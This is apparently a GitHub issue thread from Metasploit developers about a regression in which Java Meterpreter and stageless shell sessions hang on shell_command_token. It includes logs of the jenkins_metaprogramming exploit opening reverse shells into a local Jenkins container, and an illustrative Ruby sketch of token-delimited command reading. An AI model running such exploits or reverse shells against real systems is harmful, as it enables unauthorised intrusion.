msf5 exploit(multi/http/jenkins_metaprogramming) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Using URL: http://0.0.0.0:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] Local IP: http://192.168.1.2:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] /metasploit/exploit/1.0/exploit-1.0.jar requested
[+] Sending payload JAR
[*] Sending stage (53866 bytes) to 192.168.1.2
[*] Meterpreter session 40 opened (192.168.1.2:4444 -> 192.168.1.2:58403) at 2019-03-06 02:29:44 -0600
[*] Server stopped.
meterpreter > ls
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100555/r-xr-xr-x 0 fil 2019-03-06 01:17:13 -0600 .dockerenv
40554/r-xr-xr-- 4096 dir 2018-08-13 03:59:12 -0500 bin
40554/r-xr-xr-- 340 dir 2019-03-06 01:17:13 -0600 dev
40554/r-xr-xr-- 4096 dir 2019-03-06 01:17:13 -0600 etc
40554/r-xr-xr-- 4096 dir 2018-07-05 09:47:40 -0500 home
40554/r-xr-xr-- 4096 dir 2018-08-13 03:58:30 -0500 lib
40554/r-xr-xr-- 4096 dir 2018-07-05 09:47:40 -0500 media
40554/r-xr-xr-- 4096 dir 2018-07-05 09:47:40 -0500 mnt
40554/r-xr-xr-- 0 dir 2019-03-06 01:17:13 -0600 proc
40000/--------- 4096 dir 2018-07-05 09:47:40 -0500 root
40554/r-xr-xr-- 4096 dir 2018-07-05 09:47:40 -0500 run
40554/r-xr-xr-- 4096 dir 2018-08-13 03:58:30 -0500 sbin
40554/r-xr-xr-- 4096 dir 2018-07-05 09:47:40 -0500 srv
40554/r-xr-xr-- 0 dir 2019-03-06 01:17:13 -0600 sys
40776/rwxrwxrw- 4096 dir 2019-03-06 02:29:46 -0600 tmp
40554/r-xr-xr-- 4096 dir 2018-07-10 19:34:55 -0500 usr
40554/r-xr-xr-- 4096 dir 2018-08-13 03:58:44 -0500 var
meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object
[1] pry(#<Msf::Sessions::Meterpreter_Java_Java>)> shell_command_token('ls')
Rex::TimeoutError: Operation timed out.
from /rapid7/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:177:in `send_request'
[2] pry(#<Msf::Sessions::Meterpreter_Java_Java>)>
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter >
Hmm, I wonder why 'ls' would get executed as a shell command in the first place against a meterpreter, since they should have native directory listing support without running a subshell. Maybe that's a feature missing specifically from the Java one.
No, that can't be it: metasploit-payloads/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_fs_ls.java
ls is just an example. Any command hangs. Specifically, I was trying to use FileDropper and ended up testing with on_new_session and shell_command_token.
It appears that java/shell_reverse_tcp is also affected. Curiously, java/shell/reverse_tcp (staged) works.
msf5 exploit(multi/http/jenkins_metaprogramming) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Using URL: http://0.0.0.0:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] Local IP: http://192.168.1.2:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] /metasploit/exploit/1.0/exploit-1.0.jar requested
[+] Sending payload JAR
[*] Command shell session 71 opened (192.168.1.2:4444 -> 192.168.1.2:65497) at 2019-03-06 12:33:18 -0600
[*] 127.0.0.1 - Command shell session 71 closed.
[*] Server stopped.
[-] Invalid session identifier: 71
msf5 exploit(multi/http/jenkins_metaprogramming) >
msf5 exploit(multi/http/jenkins_metaprogramming) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Using URL: http://0.0.0.0:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] Local IP: http://192.168.1.2:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] /metasploit/exploit/1.0/exploit-1.0.jar requested
[+] Sending payload JAR
[*] Sending stage (2952 bytes) to 192.168.1.2
[*] Command shell session 72 opened (192.168.1.2:4444 -> 192.168.1.2:65505) at 2019-03-06 12:33:52 -0600
removed '/var/jenkins_home/.groovy/grapes/metasploit/exploit/jars/exploit-1.0.jar'
removed directory '/var/jenkins_home/.groovy/grapes/metasploit/exploit/jars'
removed '/var/jenkins_home/.groovy/grapes/metasploit/exploit/ivydata-1.0.properties'
removed '/var/jenkins_home/.groovy/grapes/metasploit/exploit/ivy-1.0.xml'
removed directory '/var/jenkins_home/.groovy/grapes/metasploit/exploit'
removed directory '/var/jenkins_home/.groovy/grapes/metasploit'
[*] Server stopped.
id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
uname -a
Linux 7f1459d523a7 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64 GNU/Linux
@timwr: Do you know anything about this? Regression?
This is exactly the sort of thing I'd break and not realize, let me have a look.
If you could post some notes on how to enable debug output in Java payloads, I'd love to have them.
I tried to add some calls to Utils.log in various places yesterday just to see what was happening, but was unable to get a java payload to log anything. If enabling debug output was something that worked like enabling debug on other Meterpreter payloads (as a datastore option), that would be doubly cool to have as a feature too.
I had a look at this but no fix yet. It seems the call to core_channel_read blocks waiting for data.
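As an added illustration of the pattern the comments above are debugging, not code from metasploit-framework or metasploit-payloads: a token-delimited command runner sends `cmd;echo <random token>` down a channelized shell, accumulates output until the token appears, and otherwise gives up after a deadline. `FakeShellChannel`, `ChannelTimeoutError` and the canned command outputs are constructed for this example; a channel built with `responds: false` stands in for the read side that never delivers data, which surfaces as the timeout seen in the session output above rather than as a hang.

```ruby
require 'securerandom'

# Raised when the channel produces no data before the deadline
# (the Rex::TimeoutError analogue in this stand-alone example).
class ChannelTimeoutError < StandardError; end

# Constructed stand-in for a channelized shell on the target: it takes what
# would go to /bin/sh's stdin and queues the bytes the shell would write back.
class FakeShellChannel
  # responds: false models the failure mode in this thread, where the
  # read side of the channel never returns anything.
  def initialize(responds: true)
    @responds = responds
    @pending = []
  end

  def write(data)
    return unless @responds
    data.each_line do |line|
      line.chomp.split(';').each { |part| @pending << run(part.strip) }
    end
  end

  # Non-blocking read: the next queued chunk, or nil if nothing is waiting.
  def read
    @pending.shift
  end

  private

  # Canned outputs for the commands typed in the thread (constructed).
  def run(cmd)
    case cmd
    when 'id' then "uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)\n"
    when 'uname -a'
      "Linux 7f1459d523a7 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64 GNU/Linux\n"
    when /\Aecho (\S+)\z/ then "#{Regexp.last_match(1)}\n"
    else "sh: #{cmd}: not found\n"
    end
  end
end

# Token-delimited execution: append an echo of a random marker, read until
# the marker shows up, return everything before it, and fail after +timeout+.
def shell_command_token(chan, cmd, timeout: 1.0)
  token = SecureRandom.alphanumeric(32)
  chan.write("#{cmd};echo #{token}\n")
  buf = +''
  deadline = Process.clock_gettime(Process::CLOCK_MONOTONIC) + timeout
  loop do
    chunk = chan.read
    if chunk
      buf << chunk
      idx = buf.index(token)
      return buf[0...idx] if idx
    elsif Process.clock_gettime(Process::CLOCK_MONOTONIC) > deadline
      raise ChannelTimeoutError, "Operation timed out after #{timeout}s waiting for token"
    else
      sleep 0.01
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  print shell_command_token(FakeShellChannel.new, 'id')
  print shell_command_token(FakeShellChannel.new, 'uname -a')
  begin
    shell_command_token(FakeShellChannel.new(responds: false), 'ls', timeout: 0.2)
  rescue ChannelTimeoutError => e
    puts "[-] #{e.message}"
  end
end
```

The random token is what lets the caller know the command has finished without parsing prompts; the deadline is what turns a channel that never answers into an error the module can handle, which is why the hang in the thread shows up as a timeout rather than a frozen console.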
Looks like this is fixed in metasploit-payloads, let's test it out. @bwatters-r7
@busterb Did #11911 fix this issue?
It did. Looks like he forgot to say the magic words.
Xyzzy